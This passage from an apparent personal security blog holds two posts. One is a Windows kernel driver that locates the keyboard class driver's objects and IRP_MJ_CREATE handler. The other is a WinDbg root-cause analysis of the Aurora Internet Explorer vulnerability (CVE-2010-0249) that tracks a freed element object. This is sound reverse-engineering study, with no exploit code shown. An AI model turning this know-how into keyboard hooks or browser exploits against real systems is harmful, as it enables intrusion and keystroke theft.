New',courier,monospace; background-color: #ffffff">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">//out of the code<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">addr of drivr=8186AAE8 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">addr of device =81798A58 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">addr of irp =F9CACDD8 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">*/</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">#include <ntddk.h> <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">VOID DriverUnload(<span style="color: #0000ff">IN</span> PDRIVER_OBJECT DriverObject);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> PDRIVER_OBJECT drvcopy;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> PDEVICE_OBJECT devcopy;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UNICODE_STRING DeviceName;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> PDEVICE_OBJECT device;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> PFILE_OBJECT <span style="color: #0000ff">file</span>;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> NTSTATUS s;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DbgPrint("<span style="color: #8b0000">driver 7\n</span>");<span style="color: #008000">//variables should be declared before</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> RtlInitUnicodeString(&DeviceName,L"<span style="color: #8b0000">\\Device\\KeyboardClass0</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> s = IoGetDeviceObjectPointer(&DeviceName,FILE_ALL_ACCESS,&<span style="color: #0000ff">file</span>,&device);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">if</span> (!NT_SUCCESS(s))<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DbgPrint("<span style="color: #8b0000">Get Device error!</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> return s;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> }<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> drvcopy = device->DriverObject;<span style="color: #008000">//device is pointer</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DbgPrint("<span style="color: #8b0000">addr of driver=%p \n</span>",drvcopy);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> devcopy = drvcopy->DeviceObject;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DbgPrint("<span style="color: #8b0000">addr of device =%p \n</span>",devcopy);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DbgPrint("<span style="color: #8b0000">addr of irp =%p \n</span>",drvcopy->MajorFunction[IRP_MJ_CREATE] );<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DriverObject->DriverUnload = DriverUnload;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> return STATUS_SUCCESS;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">}<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">VOID DriverUnload(<span style="color: #0000ff">IN</span> PDRIVER_OBJECT DriverObject)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">{<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DbgPrint("<span style="color: #8b0000">Driver Unload! \n</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">}</pre></pre><br /><p>We can see the output in DebugView</p><br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzvH1RJkPrkLWF_r7xeCaKf6KaVfbWtwIqx0l09ml7VkFhyphenhyphensFPfSMHgnnFBo5xt-vcfxskwiazzegBmEzRbFn_-r6x0jM1_EdBhiD3YtWxYmCq7M-I1ov8X-ScTGDTqQ6ijZGO9T5nPBGi/s1600-h/image%25255B10%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="236" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihKDtxwDYfLTJAq9LljNcFGexryLlRKIFTJdgHom4Y3hFVhgQQKIpJS0GidcnA3MYM07akdyVjjXYMy0UEZ56iPIQu4WNwCqv2mwH68O9_Hs7iXoCa_htUG39cZBYlHbE7shzNTS61vxMd//?imgmax=800" width="536" border="0"></a> </p><br /><p>Well “addr of irp” in the figure is address IRP_MJ_CREATE</p><br /><h4><font color="#0000ff">Thats it…..</font></h4> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-20476653248985061792011-10-16T02:55:00.001-07:002011-10-18T00:56:32.875-07:00Reversing the Aurora Vulnerability CVE-2010-0249:<p>Well this is a year old vulnerability but I thought of documenting it as was quite famous.</p> <p>and was over television news. Here are some links</p> <p><a title="http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html" href="http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html">http://indiatoday.intoday.in/story/Chinese+hackers+target+PMO/1/79215.html</a></p> <p><a title="http://www.wired.com/threatlevel/2010/01/operation-aurora/" href="http://www.wired.com/threatlevel/2010/01/operation-aurora/">http://www.wired.com/threatlevel/2010/01/operation-aurora/</a>.</p> <p>Enough of stories. </p> <p>Lets move on to technical analysis.</p> <p>I picked up a POC from internet and tested on my XP SP2.</p> <p>I opened IE in windbg and opened the POC html with IE. IE crashed at following location.</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU6qrvaZykoBe3re8QDa2puopLvb2aAd95LjF7EwxPYhHRfwxu4sFo39q4eOlU2mNBILX8d8Rxo8W3CscioT7BquHRO1cF1U9DznFgW14y-UbxlNxrj68ABk7cRT8DamcLNZI6zAnr-aS_/s1600-h/image%25255B3%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="164" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyphenhyphenTY-os6UIvVxUNl7YWEwcHn8mxy3pykh7oDumnF0vnLHO2DwIZan4VlJDf0VghLowcNXSxJIOG4pbLahZW0GSSWWIsdy42z_vPTLML3hEzI8olwy0lKyX7mRpuBSxj8vz-46Yn6a55wR//?imgmax=800" width="505" border="0"></a></p> <p>Looking at the disassembly of the location:</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikMm1lf00Qgr-bzsVCo8SJwPE4wLclGm0jBICQnH1n5-gi5NdYR2upzlAUYKuK9krzgDvzgI5zOpgX_VuX2NEnIUp3ykajI5yVx6MyqPl-b25WZ2Tm0rLUQF4T8hJV2BPDCVaZbMvgma4f/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="137" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxFdWtqJJcBQnblzAGmNQ-bhURe2J8Ro8fAgoxf6XqNNO40i9FL8xFHxMzAOexdZ7EDNh4OyH3VXFshyNroP5upm8juJZ3opFFcl0ERtQbv7SJ56czxKmx-BLkN9ZfIJRm5rzq9SozKOs6//?imgmax=800" width="515" border="0"></a> </p> <p>We see the the Crash happens at the GetDocPtr</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZOBZ25uJYmVj4c7oaXWRaizBhTrzezs3V4V00bJI32CQvMovdQCz2jco-07Mx48e4fIIUbwKtAp6ypijcLCwsqR3KKhRoloYs9IIfo8a5nyokBXANQsrSq57ZNFfQk_yNHgAJSipdcmEv/s1600-h/image%25255B16%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="95" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzVY7jsVRjbb7jo0Rc47uVU4QfWEXWrw-jXyZZanNqgsVL-Ul11Ektgqm9ghYYfTduZ19XoJOojT9tCNlkqPFiO1BLHS_IfAy5_ZycYfuEFyynLw1N3aKPg7AQUOJsKCcN6Kq0JCtSMWsQ//?imgmax=800" width="510" border="0"></a> </p> <p>It looks like the address pointed by ecx register has invalid data which causes the access violation.</p> <p>Looking at the stack trace</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLiGo-Rh8m9n7kjsRfuGSGOoHnHxGClgpm2tmP5u3xXX3t25U9sq689Dwr8G9BiBmALB_rpQ5w0xWjW8BRaaOESQO2xTUi-WhxrW-xlhDfb22Q2DZ9vnDKQ4hGU7Oym6VPd5oAAom-KNG2/s1600-h/image%25255B20%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="139" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLSkIKnYIcerg_1cuTCAS_OaJTd1magxlsdsIsVZPwnyw4pquthyphenhyphenczWJqbFYLNtNdCgVkg9a2dWjh7pVq1xDcgh6oPbIRAJrNcX1Nod9zSFrE5Vfbxb5hTXKcgiP_sHxMY_OYEtYybSwP//?imgmax=800" width="530" border="0"></a> </p> <p>Looking at the function mshtml!CEventObj::GenericGetElement</p> <p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujeov5uEse8bC5VV4RKDcMab9p5FVMATe5-8F3w7x-dj4AbnMPy76kj3UgmnbfavMbBS-OCTeP4WnghyoB7Ruq_WLkzfmEGSAZvaQEO1CUbGImTX9yFaFF4XGfuxXSi8D4sGiPCwhyphenhypheng9Y/s1600-h/image%25255B24%25255D.png"><img title="image" style="border-top-width: 0px; display: inline; border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px" height="114" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgldHI1pmP48ta2vUNTp_k9MnP3Jm7VmyUJELjhpvwALEkKwxvgibmGL4wm70u2akpSp3Bpp-O9T_TU4bzy5_3paWwJRuJVTJwYLDLXnLAPbHj9pPTs9PVhyphenhyphenaAYR0Rw06-c9_AuKsFB3dV8//?imgmax=800" width="542" border="0"></a> </p> <p>It looks like ecx value is derived from the value at address pointed by esi.</p> <p>restart windbg and set breapoint</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 511px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 42px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x97</pre></pre><br /><p> the press g. when internet explorer comes up open the html page.</p><br /><p>We break at the point and view the contents of address pointed by esi.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds poi(esi) l1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">036f7b30 7d4c1850 mshtml!CImgElement::`vftable'<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds ecx l1<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">036f7b30 7d4c1850 mshtml!CImgElement::`vftable'</pre></pre><br /><p>We see that the that the ecx points CImgElement Vtable is</p><br /><p>Looking at the Vtable</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 111px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> dds 7d4c1850 l10<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1850 7d6de377 mshtml!CImgElement::PrivateQueryInterface<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1854 7d4f43c9 mshtml!CElement::PrivateAddRef<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1858 7d4f4cdd mshtml!CElement::PrivateRelease<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c185c 7d519a0e mshtml!C1DElement::`vector deleting destructor<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1860 7d56c685 mshtml!CImgElement::Init<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1864 7d56c5e0 mshtml!CImgElement::Passivate<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1868 7d63ba1f mshtml!CBase::GetEnabled<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c186c 7d63ba1f mshtml!CBase::GetEnabled<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1870 7d63b1f2 mshtml!CBase::GetPages<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1874 7d63b644 mshtml!CBase::InterfaceSupportsErrorInfo<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1878 7d6df0f8 mshtml!CImgElement::QueryStatus<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c187c 7d6dff5f mshtml!CImgElement::Exec<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1880 7d4fad5c mshtml!CRect::CRect<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c1884 7d4f4e9d mshtml!CElement::SecurityContext<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4c1888 7d4f7c1c mshtml!CBase::SecurityContextAllowsAccess<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d4c188c 7d5e71d8 mshtml!CElement::DesignMode</pre></pre><br /><p>We can use the following winbg command to automate to see what all variables are created at esi at the address</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x93 "<span style="color: #8b0000">.printf \"esi = [%08x] \",esi;dds poi(esi) l1;gc</span>"</pre></pre><br /><p>I press g in windbg and see the following</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 502px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 119px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 94.9%; font-family: consolas,'Courier New',courier,monospace; height: 11px; background-color: #fbfbfb">esi = [036f7f20] 036f7b30 7d4c1850 mshtml!CImgElement::`vftable<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">esi = [036f7f20] 036f7b30 7d4c1850 mshtml!CImgElement::`vftable<span style="color: #008000">'</span><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">ModLoad: 75c50000 75cbe000 C:\WINDOWS\system32\jscript.dll<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">esi = [036f6b60] aaaaaaaa ????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">(8b8.768): Access violation - code c0000005 (first chance)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">First chance exceptions are reported before any exception handling.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">This exception may be expected <span style="color: #0000ff">and</span> handled.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=036f7bc0 ebx=aaaaaaaa ecx=aaaaaaaa edx=03703cd0 esi=036f6b60 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d4f2531 esp=0013e154 ebp=0013e174 iopl=0 nv up ei pl nz na pe nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CElement::GetDocPtr:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2531 8b01 mov eax,dword ptr [ecx] ds:0023:aaaaaaaa=????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p>We see that esi always points the CImgElement is created at the place.<br /><p>Restart windbg clear all the old breakpoints using bc *.<br /><p>Let us find which all function cause the exception and<br /><p>I set another breapoint </p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">bp mshtml!CEventObj::GenericGetElement+0x97</pre></pre><br /><p>and run windbg. Windbg breaks at the following location</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 500px; padding-top: 5px; border-bottom: #cecece 1px solid; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Breakpoint 0 hit<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=0013e4c8 ebx=036f7b30 ecx=036f7b30 edx=0013dfc0 esi=036f7f20 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d6d5250 esp=0013df7c ebp=0013df98 iopl=0 nv up ei pl nz na po nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CEventObj::GenericGetElement+0x97:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d6d5250 e8dcd2e1ff <span style="color: #0000ff">call</span> mshtml!CElement::GetDocPtr (7d4f2531)</pre></pre><br /><p>Lets set breakpoint at the address pointed by ecx and see which function write on the address ecx=036f7b30 <br /><p>After the breakpoint is hit I clear all the breakpoints and set breakpoint on write <br /><p>ecx=036f7b30 </p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 503px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 143px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> bc *<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0:000> ba w4 036f7b30 "<span style="color: #8b0000">.printf \"eip=[%08x] \n\n \",eip;u eip l1;gc</span>"<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0:000> g<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eip=[7d519a43] mshtml!CElement::~CElement+0x10:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">7d519a43 7406 je mshtml!CElement::~CElement+0x18 (7d519a4b)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">ModLoad: 75c50000 75cbe000 C:\WINDOWS\system32\jscript.dll<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=[7d4f2c22] mshtml!<span style="color: #0000ff">CStr</span>::<span style="color: #0000ff">Set</span>+0x3e:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2c22 83c004 <span style="color: #0000ff">add</span> eax,4<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">(464.960): Access violation - code c0000005 (first chance)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">First chance exceptions are reported before any exception handling.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">This exception may be expected <span style="color: #0000ff">and</span> handled.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">eax=036f8a50 ebx=aaaaaaaa ecx=aaaaaaaa edx=03703df0 esi=036f7fc0 edi=ffffffff<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">eip=7d4f2531 esp=0013e154 ebp=0013e174 iopl=0 nv up ei pl nz na pe nc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">mshtml!CElement::GetDocPtr:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">7d4f2531 8b01 mov eax,dword ptr [ecx] ds:0023:aaaaaaaa=????????<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p>It looks like some of the functions which write the address are </p><br /><p>shtml!CElement::~CElement<br>mshtml!CStr::Set<br /><p> </p><br /><h3><font color="#008000">To be continued. . .</font></h3> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-83714739331218942142011-10-11T22:33:00.001-07:002011-10-31T22:00:37.709-07:00Unpacking 